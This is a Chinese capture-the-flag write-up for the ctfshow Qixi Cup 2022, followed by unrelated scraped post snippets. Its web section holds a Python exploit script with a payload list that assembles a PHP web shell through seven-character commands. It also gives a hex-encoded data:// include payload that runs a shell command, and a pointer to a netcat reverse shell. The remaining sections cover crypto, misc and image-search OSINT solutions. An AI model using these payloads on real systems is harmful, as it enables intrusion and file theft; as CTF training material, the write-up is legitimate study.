文章目录

  • Web
    • web签到
    • easy_calc
    • easy_cmd
  • Crypto
    • 密码签到
  • Misc
    • 杂项签到
  • Osint
    • 社工签到
    • 迷失的大象
    • 大飞机

原文

Web

web签到

固定长度RCE,限定7位数字,直接给出exp

# -*- coding: utf-8 -*-
# @Time : 2022/8/4 22:03
# @Author : pysnow
# !/usr/bin/python
# -*- coding: UTF-8 -*-
import timeimport requestsurl = "http://4432ad06-416e-4375-9e8a-e8499e9bb8cb.challenge.ctf.show/api/tools.php"
print("[+]start attack!!!")
with open("payload.txt", "r") as f:for i in f:print("[*]" + url.format(i.strip()))data = {"cmd": i.strip()}res = requests.post(url, data=data)time.sleep(3)print(res.text)test = requests.get("http://172d5c73-1dfe-4f7c-b39e-599a19aba8df.challenge.ctf.show/api/1.php")
if test.status_code == requests.codes.ok:print("[*]Attack success!!!")
>hp
>1.p\\
>d\>\\
>\ -\\
>e64\\
>bas\\
>7\|\\
>XSk\\
>Fsx\\
>dFV\\
>kX0\\
>bCg\\
>XZh\\
>AgZ\\
>waH\\
>PD9\\
>o\ \\
>ech\\
ls -t>0
sh 0

因为网络问题,每一条命令执行的时间都相近,所以要加一个延时,堵塞一下,保证文件名的顺序正确

然后访问1.php,RCE就行

easy_calc

源码

 <?phpif(check($code)){eval('$result='."$code".";");echo($result);
}function check(&$code){$num1=$_POST['num1'];$symbol=$_POST['symbol'];$num2=$_POST['num2'];if(!isset($num1) || !isset($num2) || !isset($symbol) ){return false;}if(preg_match("/!|@|#|\\$|\%|\^|\&|\(|_|=|{|'|<|>|\?|\?|\||`|~|\[/", $num1.$num2.$symbol)){return false;}if(preg_match("/^[\+\-\*\/]$/", $symbol)){$code = "$num1$symbol$num2";return true;}return false;
}

一个传三个参数,其中两个数字,一个符号,分号这些没过滤,可以执行多个命令,所以寻找最容易绕过的地方,也就是num12

/!|@|#|\\$|\%|\^|\&|\(|_|=|{|'|<|>|\?|\?|\||`|~|\[/

过滤了很多符号,最重要的用来执行函数的括号也给过滤了,但是有个东西执行是不需要括号的,那就是文件包含

include "1.php" == include("1.php");
include "data://text/plain,<?php phpinfo(); ?>" == phpinfo();

这里data内容可以使用hex编码绕过,即最终payload如下

num1=include "\x64\x61\x74\x61\x3a\x2f\x2f\x74\x65\x78\x74\x2f\x70\x6c\x61\x69\x6e\x2c\x3c\x3f\x70\x68\x70\x20\x73\x79\x73\x74\x65\x6d\x28\x27\x63\x61\x74\x20\x2f\x73\x65\x63\x72\x65\x74\x27\x29\x3b\x3f\x3e";&symbol=%2D&num2=1

flag在/secret

easy_cmd

源码

<?phperror_reporting(0);
highlight_file(__FILE__);$cmd=$_POST['cmd'];if(preg_match("/^\b(ping|ls|nc|ifconfig)\b/",$cmd)){exec(escapeshellcmd($cmd));
}
?>

白名单,只给了ping ls ifconfig nc四个命令,由于这道题出网,所以可以直接用nc反弹shell

Crypto

密码签到

** 密文:y3rmc2hvd3tjcnlwdg9fc2lnbmlux2lzx2vhc3l9-a0004008a0**

描述:大牛在今年的hvv过程中,渗透进某业务系统,发现了密文,可是不知道如何解出明文,你能帮他找出来吗? 已知密文由两部分组成,后面的推测为秘钥

base64解一下,然后直接因为解出来的结果比较特殊,可以直接通过句意猜测出flag

ctfshow{crypto_signin_is_easy}

Misc

杂项签到

010打开,在文件结尾出有flag

Osint

社工签到

给了一张图,要求找到图中所在的位置,通过观察图片可以发现这是一个微博博主发的

本来做题的时候是直接找到了跟这个原图很相似的博文,结果后面补wp的时候又找不到了,所以直接百度识图吧

天涯镇 or 天涯小镇

迷失的大象

百度识图一把梭

ctfshow{墨江哈尼族自治县}

大飞机

同样是百度识图,找到一个贴吧

因为航班太久远了,所以搜索不到航班,尝试搜索另外一张图片找到了下面这篇知乎匿名回答,用的是原图,其中的评论区答案就是航班号

ctfshow{CA981}

ctfshow七夕杯2022相关推荐

  1. ctfshow七夕杯

    ctfshow七夕杯misc海盗的密码WP 题目链接 题目描述 阿卜杜拉希.三哈.穆罕默德是一名来自索马里的海盗,当他不工作的时候,就喜欢窝在家里上上网,学学安全方面的知识. 听说他喜欢用ip地址做密 ...

  2. ctfshow七夕杯复现

    Docs web web签到 七字符rce CTF中字符长度限制下的命令执行 rce(7字符5字符4字符)汇总_OceanSec的博客-CSDN博客 一点一点拼shell easy_calc < ...

  3. ctfshow七夕杯 writeup

    文章目录 杂项签到 你会lsb吗 海盗的密码 密码签到 社工签到 迷失的大象 大飞机 杂项签到 flag在最底部 你会lsb吗 从后往前看是504b0304,需要将内容给反转一下 with open( ...

  4. CTFshow - 七夕杯复现

    Web web签到 在做的时候源码是直接手测发现有长度限制 7 位 在源码中也可以看到 js 代码 抓包后可以测得前后端都被过滤 可以直接一条命令 ls /*>1 在 /api/ 下访问下载文件 ...

  5. ctfshow 七夕杯(复现)

    1.签到题 (限制长度的命令执行 七字符.五字符.四字符) 网页源码中存在提示,限制长度为7字符 function isSafe(cmd) { return cmd.length<=7; } 1 ...

  6. ctfshow 七夕杯

    WEB签到 easy_calceasy_cmdMISC签到lsb海盗的密码OSINT WEB 签到 # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2 ...

  7. 第十三届蓝桥杯 2022年省赛真题(Java 大学C组)

    蓝桥杯 2022年省赛真题(Java 大学C组) 目录 试题 A: 排列字母 试题 B: 特殊时间 试题 C: 纸张尺寸 试题 D: 求和 试题 E: 矩形拼接 试题 F: 选数异或 试题 G: GC ...

  8. 2032: [蓝桥杯2022初赛] 顺子日期

    2032: [蓝桥杯2022初赛] 顺子日期 内存限制:256 MB 时间限制:1 S 标准输入输出 题目类型:传统 评测方式:文本比较 上传者:外部导入 提交:384 通过:153 题目描述 小明特 ...

  9. P8775 [蓝桥杯 2022 省 A] 青蛙过河

    题目链接:[蓝桥杯 2022 省 A] 青蛙过河 - 洛谷 解法一:打暴力: 二分+模拟 很直接,不解释,肯定超时 代码: #include<iostream> #include<c ...

最新文章

  1. 【BZOJ 3171】 [Tjoi2013]循环格
  2. java多个数求和_Java:多个数求和
  3. docker之container
  4. C# 使用int.TryParse,Convert.ToInt32,(int)将浮点类型转换整数时的区别
  5. 分组数据方差公式_连续变量假设检验 之 单因素方差检验
  6. 为什么强烈不推荐使用stop、suspend方法来中断线程?
  7. django mysql 登陆界面_django 简单实现登录验证给你 Django用户登录验证跳转问题
  8. 基于NSIS的Qt项目打包
  9. cso是什么职位(企业cso是什么职位)
  10. 笔记本系统恢复连载之九:神舟笔记本系统恢复
  11. ffmpeg之H265解码
  12. FANUC机器人示教器介绍
  13. 哈尔·埃尔罗德《早起的奇迹》读书笔记
  14. js判断文件后缀名方法
  15. 怒肝最新保姆级前端学习路线,速成贴心全面!
  16. CHD 5.10 离线安装
  17. 【前端静态资源托管库-CDN】BootCDN资源全线失效
  18. 13. nginx四层 https代理https 前后端证书配置
  19. RecyclerView实现条目拖拽,左滑、右滑移除效果
  20. 铁氧体磁芯电感的特性大揭秘

热门文章

  1. 计算机网线怎么连接另一台电脑,求解一台电脑怎么连接另一台电脑上网
  2. CF1463-D. Pairs
  3. deepin官方历史版本存档
  4. Android项目R文件丢失报错
  5. android 卡片投影渐变,受Duolingo启发的ViewPager卡片效果
  6. 《中国合伙人》经典台词:一个人迫于无奈之下的选择,往往是正确的。。。
  7. python库——h5py读取h5文件
  8. Mysql按条件求和Sum函数
  9. Conmi的正确答案——米家第一个ReactNative程序开发记录
  10. #990 Satisfiability of Equality Equations